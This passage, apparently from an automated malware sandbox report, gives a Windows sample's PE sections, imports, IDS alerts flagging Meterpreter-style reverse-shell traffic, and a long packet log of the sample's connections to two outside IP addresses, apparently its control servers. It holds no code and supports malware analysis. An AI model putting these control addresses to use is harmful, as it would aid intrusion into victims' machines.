.rsrc	0x142000	0xc000	0xbe00	7e23854d476d5de11568c28b3d5fab11	False	0.06400082236842106	data	1.6668765497907099	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_LNK_NRELOC_OVFL, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x142100	0xb648	Device independent bitmap graphic, 200 x 400 x 8, image size 40000, 256 important colors	English	United States	0.050124292816732384
RT_GROUP_ICON	0x14d74c	0x14	data	English	United States	1.15
RT_VERSION	0x14d764	0x260	data	English	United States	0.4720394736842105

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress
bcryptprimitives.dll	ProcessPrng
crypt32.dll	CertOpenStore
KERNEL32.DLL	LoadLibraryA, CopyContext, GetProcAddress, VirtualProtect
msvcrt.dll	exit
ntdll.dll	NtWriteFile
secur32.dll	DecryptMessage
ws2_32.dll	bind

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T05:29:55.785387+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49917	TCP
2024-12-05T05:30:02.018686+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49731	TCP
2024-12-05T05:30:07.601315+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49733	TCP
2024-12-05T05:30:11.022236+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49734	TCP
2024-12-05T05:30:14.429556+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49735	TCP
2024-12-05T05:30:17.857559+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49738	TCP
2024-12-05T05:30:21.424773+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49742	TCP
2024-12-05T05:30:24.882636+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49744	TCP
2024-12-05T05:30:28.370918+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49745	TCP
2024-12-05T05:30:31.802831+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49746	TCP
2024-12-05T05:30:35.237676+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49747	TCP
2024-12-05T05:30:39.114934+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49748	TCP
2024-12-05T05:30:42.545267+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49749	TCP
2024-12-05T05:30:45.997969+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49750	TCP
2024-12-05T05:30:49.454200+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49751	TCP
2024-12-05T05:30:52.947888+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49752	TCP
2024-12-05T05:30:56.391228+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49753	TCP
2024-12-05T05:30:59.851798+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49756	TCP
2024-12-05T05:31:03.394222+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49767	TCP
2024-12-05T05:31:06.867041+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49773	TCP
2024-12-05T05:31:10.305104+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49784	TCP
2024-12-05T05:31:13.889242+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49790	TCP
2024-12-05T05:31:17.347274+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49800	TCP
2024-12-05T05:31:20.880712+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49809	TCP
2024-12-05T05:31:24.327126+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49817	TCP
2024-12-05T05:31:27.740736+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49828	TCP
2024-12-05T05:31:31.173759+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49834	TCP
2024-12-05T05:31:34.639153+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49845	TCP
2024-12-05T05:31:38.111359+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49852	TCP
2024-12-05T05:31:41.575021+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49862	TCP
2024-12-05T05:31:44.996980+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49873	TCP
2024-12-05T05:31:48.427962+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49879	TCP
2024-12-05T05:31:51.998954+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49890	TCP
2024-12-05T05:31:55.566157+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49897	TCP
2024-12-05T05:31:59.067743+0100	2035651	ET MALWARE Meterpreter or Other Reverse Shell SSL Cert	1	202.175.7.146	10203	192.168.2.4	49907	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 05:29:56.099116087 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:56.099148989 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:56.099210978 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:56.109631062 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:56.109646082 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:58.313038111 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:58.313275099 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:58.314225912 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:58.314286947 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:58.325448036 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:58.325470924 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:58.325819016 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:58.366698027 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:58.454137087 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:58.495345116 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.008119106 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.008142948 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.008313894 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.008349895 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.008397102 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.024976969 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.025110006 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.033035994 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.033261061 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.050153971 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.050400972 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.195044994 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.195158958 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.207469940 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.207613945 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.219130039 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.219203949 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.235821009 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.235882998 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.244210005 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.244272947 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.260878086 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.260943890 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.270788908 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.270872116 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.275783062 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.275846004 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.285588026 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.285679102 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.295460939 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.295619011 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.389273882 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.389539003 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.394117117 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.394202948 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.403637886 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.403840065 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.412959099 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.413029909 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.417809963 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.417869091 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.427150011 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.427222013 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.436450005 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.436503887 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.441313982 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.441406012 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.450048923 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.450114965 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.458046913 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.458161116 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.462238073 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.462312937 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.470383883 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.470479965 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.478425026 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.478488922 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.486512899 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.486624002 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.490784883 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.490878105 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.579801083 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.580090046 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.583061934 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.583122015 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.589591980 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.589657068 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.595779896 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.595873117 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.599025011 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.599083900 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.605101109 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.605184078 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.610800982 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.610877991 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.613735914 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.613797903 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.619236946 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.619302034 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.624578953 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.624656916 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.629954100 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.630008936 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.632682085 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.632741928 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.637943983 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.638025999 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.643331051 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.643393040 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.646095037 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.646264076 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.651360989 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.651439905 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.656737089 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.656796932 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.659485102 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.659585953 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.666143894 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.666241884 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.668885946 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.668946028 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.674154997 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.674216032 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.679514885 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.679590940 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.682301044 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.682353020 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.687571049 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.687647104 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.692945957 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.693023920 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.695749044 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.695813894 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.701050043 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.701112032 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.706341982 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.706454039 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.772061110 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.772284031 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.776201010 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.776261091 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.778284073 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.778345108 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.782250881 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.782342911 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.786159992 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.786221027 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.788264036 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.788350105 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.792260885 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.792320013 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.796116114 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.796164989 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.798222065 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.798275948 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.802191019 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.802246094 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.806061983 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.806113958 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.810045004 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.810105085 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.812155962 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.812208891 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.816004992 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.816063881 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.819984913 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.820044994 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.822117090 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.822182894 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.825608015 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.825664043 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.828778982 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.828834057 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.829617977 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.829668999 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.829680920 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.829694986 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.829744101 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.831404924 CET	49730	443	192.168.2.4	118.31.219.225
Dec 5, 2024 05:29:59.831423998 CET	443	49730	118.31.219.225	192.168.2.4
Dec 5, 2024 05:29:59.923099995 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:00.042947054 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:00.043096066 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:00.043615103 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:00.163336992 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:01.604512930 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:01.647723913 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:01.897173882 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:01.898900986 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:02.018686056 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:02.451359987 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:02.491498947 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:02.740217924 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:02.788353920 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:04.842457056 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:04.962301016 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.397633076 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.397945881 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.397986889 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.398004055 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.398015022 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.398034096 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.398051977 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.398072958 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.426795006 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.426827908 CET	49731	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.546432018 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.546657085 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.546760082 CET	10203	49731	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.666630983 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:05.666826010 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.667951107 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:05.787708044 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:07.206674099 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:07.257255077 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:07.480142117 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:07.481547117 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:07.601315022 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.025048018 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.069762945 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.304163933 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.305300951 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.425195932 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849266052 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849296093 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849358082 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849436045 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849477053 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849492073 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.849499941 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.849538088 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.849538088 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.849725962 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.849754095 CET	49733	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.963555098 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:08.969427109 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:08.969445944 CET	10203	49733	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:09.083758116 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:09.083861113 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:09.084227085 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:09.204196930 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:10.623071909 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:10.663383961 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:10.901307106 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:10.902487040 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:11.022236109 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:11.443284988 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:11.491674900 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:11.713516951 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:11.714238882 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:11.834043980 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:12.257919073 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:12.257941961 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:12.257957935 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:12.258014917 CET	49734	10203	192.168.2.4	202.175.7.146
Dec 5, 2024 05:30:12.258085966 CET	10203	49734	202.175.7.146	192.168.2.4
Dec 5, 2024 05:30:12.258097887 CET	10203	49734	202.175.7.146	192.168.2.4
